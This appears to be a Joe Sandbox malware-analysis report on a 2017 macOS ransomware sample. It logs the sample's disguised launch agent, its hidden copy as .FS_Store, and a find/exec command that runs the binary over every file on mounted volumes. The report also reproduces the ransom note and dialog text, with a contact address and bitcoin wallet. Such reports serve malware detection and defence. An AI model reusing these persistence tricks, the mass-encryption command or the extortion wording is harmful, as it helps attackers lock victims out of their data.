Joe Sandbox Cloud Pro Analysis Report

Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:38999
Start time:18:06:13
Joe Sandbox Product:Cloud
Start date:16.06.2017
Overall analysis duration:0h 16m 47s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:macRansom
Cookbook file name:default.jbs
Analysis system description:Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection:MAL
Classification:mal80.rans.evad.mac@0/163@0/0
Warnings:
Show All
  • Report creation exceeded maximum number of non-whitelisted processes and may have missing process information.


Detection

StrategyScoreRangeReportingDetection
Threshold800 - 100Report FP / FNmalicious


Classification

Analysis Advice

Exit code suggests that the sample could not be started, try looking at standard streams or writes to anonymous pipes for possible reason



Signature Overview

Click to jump to signature section


Spam, unwanted Advertisements and Ransom Demands:

barindex
Executes the "find" command together with an exec argument (may be an indication for ransomware)Show sources
Source: /bin/sh (PID: 715)Find command executed: find /Volumes /var/root ! -path /var/root/Library/.FS_Store -type f -size +8c -user root -perm -u=r -exec /var/root/Library/.FS_Store {} +
Creates a notice file (html or txt) to demand a ransomShow sources
Source: /var/root/Library/.FS_StoreFile dropped: /private/var/root/Desktop/._README_ -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__0 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__1 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__2 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__3 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__4 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__5 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__6 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__7 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Source: /bin/shFile dropped: /private/var/root/Desktop/__README__8 -> all your files are encrypted, i am the only person in the world with the key that can unlock them.if you need proof, zip 3 of the encrypted files then email it to getwindows@protonmail.com along with the serial number of your device.if you want to buy our decryption software, transfer 0.25 bitcoin to 11jq5brc2woy3clqxzkteb6jjut8oxqsv within 7 days.your key will be automatically removed from our server after 7 days, therefore, even us can no longer unlock your files after n1
Uses Apple script to display a ransom dialog messageShow sources
Source: /bin/sh (PID: 736)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 740)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 743)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 747)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 750)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 753)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 756)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 759)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 762)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 765)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal80.rans.evad.mac@0/163@0/0

Persistence and Installation Behavior:

barindex
Reads data from the local random generatorShow sources
Source: /var/root/Library/.FS_Store (PID: 704)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 736)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 736)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 740)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 740)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 743)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 743)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 747)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 747)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 750)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 750)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 753)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 753)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 756)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 756)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 759)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 759)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 762)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 762)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 765)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 765)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 768)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 768)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 771)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 771)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 774)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 774)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 777)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 777)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 780)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 780)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 784)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 784)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 787)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 787)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 790)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 790)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 793)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 793)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 796)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 796)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 799)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 799)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 802)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 802)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 805)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 805)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 808)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 808)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 811)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 811)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 814)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 814)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 817)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 817)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 820)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 820)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 823)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 823)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 826)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 826)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 829)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 829)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 832)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 832)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 835)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 835)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 838)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 838)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 841)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 841)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 844)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 844)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 847)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 847)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 850)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 850)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 853)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 853)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 856)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 856)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 859)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 859)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 862)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 862)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 865)Random device file read: /dev/random
Source: /usr/bin/osascript (PID: 865)Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /usr/bin/osascript (PID: 736)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 740)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 743)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 747)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 750)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 753)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 756)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 759)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 762)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 765)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 768)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 771)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 774)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 777)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 780)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 784)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 787)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 790)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 793)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 796)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 799)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 802)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 805)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 808)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 811)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 814)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 817)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 820)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 823)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 826)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 829)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 832)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 835)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 838)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 841)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 844)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 847)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 850)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 853)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 856)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 859)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 862)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /usr/bin/osascript (PID: 865)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to diskShow sources
Source: /Users/vreni/Desktop/macRansom (PID: 686)XML plist file created: /private/var/root/Library/LaunchAgents/com.apple.finder.plist
Creates hidden files, links and/or directoriesShow sources
Source: /bin/mv (PID: 697)Hidden file moved: /Users/vreni/Desktop/macRansom -> /var/root/Library/.FS_Store
Source: /var/root/Library/.FS_Store (PID: 704)Hidden file created: /var/root/Desktop/._README_
Creates launch services that start periodicallyShow sources
Source: /Users/vreni/Desktop/macRansom (PID: 686)Launch agent/daemon created with StartInterval and/or StartCalendarInterval, file created: /var/root/Library/LaunchAgents/com.apple.finder.plist
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'Show sources
Source: /bin/sh (PID: 736)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 740)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 743)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
Source: /bin/sh (PID: 747)Osascript command executed: osascript -e display dialog 'ALL YOUR FILES ARE ENCRYPTED, I AM THE ONLY PERSON IN THE WORLD WITH THE KEY THAT CAN UNLOCK THEM.IF YOU NEED PROOF, ZIP 3 OF THE ENCRYPTED FILES THEN EMAIL IT TO getwindows@protonmail.com ALONG WITH THE SERIAL NUMBER OF YOUR DEVICE.IF YOU WANT TO BUY OUR DECRYPTION SOFTWARE, TRANSFER 0.25 BITCOIN TO 11Jq5BRc2woy3CLQXzkteb6JjUt8oXQsv WITHIN 7 DAYS.YOUR KEY WILL BE AUTOMATICALLY REMOVED FROM OUR SERVER AFTER 7 DAYS, THEREFORE, EVEN US CAN NO LONGER UNLOCK YOUR FILES AFTER N1' buttons 'Destory My Mac'
